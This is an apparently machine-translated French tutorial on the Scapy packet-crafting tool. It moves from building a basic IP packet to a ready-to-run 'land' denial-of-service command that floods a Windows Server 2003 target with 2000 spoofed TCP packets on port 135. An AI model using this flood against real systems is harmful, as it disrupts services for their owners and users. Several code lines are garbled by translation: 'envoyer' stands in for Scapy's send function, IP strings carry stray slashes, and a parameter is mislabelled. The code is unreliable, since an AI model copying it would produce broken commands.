Scapy est un outil universel pour mettre en œuvre des attaques réseau.
Petukhov Oleg, avocat en droit international et protection des renseignements personnels, spécialiste de l'information sécurité, protection de l'information et des données personnelles.
Canal Telegram: https://t.me/protecciondelainformacion
Groupe au Télégramme: https://t.me/securiteinformatique2
Site: https://legascom.ru
Courriel : online@legascom.ru
#sécuritéinformations #informationsécurité
Avant de commencer à examiner les types d'attaques réseau, j'aimerais présenter au lecteur un autre outil intéressant et flexible qui fait partie de Kali Linux, l'utilitaire Scapy. Cet utilitaire flexible et fonctionnel est écrit en Python. Cet utilitaire est conçu pour effectuer des manipulations avec des paquets réseau. Il vous permet de collecter le paquet IP de la structure requis pour les attaques réseau.
Avant de commencer avec Scapy, vous devez vous souvenir de la structure du paquet IP.
En travaillant avec l'utilitaire Scapy, on va remplir nous-mêmes ces champs avec les informations nécessaires.
Alors, lancez Scapy.
racine@kali:~# scapy
>>>
Après l'exécution de l'utilitaire, l'invite de saisie est«>>>". La présence de cette invite indique que Scapy est en mode interactif et que toutes les commandes que vous tapez seront interprétées par L'utilitaire.
Pour commencer, voyons la configuration actuelle.
>>> conf
La commande conf affiche les paramètres actuels à partir du fichier de configuration.
Maintenant, on doit créer notre propre paquet. Comme vous le savez, la pile TCP/IP dans différents systèmes d'exploitation est basée sur la conformité aux normes RFC qui définissent l'interaction réseau. Toutefois, les paquets créés ne doivent pas toujours être entièrement conformes aux normes RFC pour exécuter différentes attaques.
Dans Scapy, vous devez d'abord définir les variables et les attributs de paquet souhaités. Ainsi, la variable x nous déterminerons la valeur ttl du paquet, égale à 64.
>>> x=IP(ttl=64)
>>> x
Ensuite, on ajoute des attributs supplémentaires à notre package. Tout d'abord, on a besoin des adresses de l'expéditeur et du destinataire. Dans l'exemple ci-dessous, l'expéditeur est 192.168.1.101 et le destinataire est 192.168.1.122.
>>> x.src="/192.168.1.101"
>>> x.dst="192.168.1.122"
Vous pouvez vérifier les valeurs actuelles de la variable x en spécifiant simplement le nom de la variable dans l'interpréteur.
>>> x
De plus, Scapy a de nombreuses fonctionnalités intégrées. Vous pouvez trouver ces fonctions à l'aide de la commande lsc.
>>> lsc()
Comme un autre exemple, utilisez la commande «send". Cette commande est utilisée lorsque nous devons envoyer un paquet. À titre d'exemple, essayons d'envoyer le paquet que nous avons créé dans la variable X.
>>> envoyer(x)
Comme vous pouvez le constater, notre colis spécialement conçu a été envoyé à l'adresse du destinataire. De même, vous pouvez spécifier d'autres paramètres de paquet IP, tels que window_size, flags, fragmentation, acknowledgement, Sequence number.
Maintenant, on va faire une petite attaque DDoS avec Scapy. Disons que nous avons un système cible exécutant Windows Server 2003 (curieusement, jusqu'à présent, des centaines de milliers de serveurs exécutent ce système d'exploitation) et vulnérable à une attaque de type «land». Cette attaque DoS consiste à envoyer un grand nombre de paquets avec les mêmes adresses IP et ports de l'expéditeur et du destinataire. À la suite de cette attaque, la machine ne se bloque pas nécessairement, mais le ralentissement du système se produira nécessairement. Par exemple, pour les serveurs Web, une telle attaque peut être critique.
Avec Scapy, vous pouvez implémenter Cette attaque comme suit.
>>> envoyer(IP(src="/192.168.1.122", dst="192.168.1.122")/TCP(sport=135,dport=135), count=2000)
Dans cet exemple :
envoyer-envoyer un paquet;
Protocole IP utilisé ;
src = "192.168.1.122",;
dst= "192.168.1.122",;
TCP - protocole de couche de transport ;
sport=135-port source;
port=135-port du destinataire ;
count=2000 est le nombre de paquets qu'on veut envoyer.
Scapy n'est pas seulement un moyen d'implémenter des attaques par déni de service.
Avec l'aide de cet utilitaire, vous pouvez construire n'importe quel paquet avec les champs et le contenu souhaités. Par conséquent, je vous recommande d'utiliser cet outil lors des audits de sécurité de l'information.
Dans les prochains articles, nous reviendrons sur les attaques au niveau du réseau.
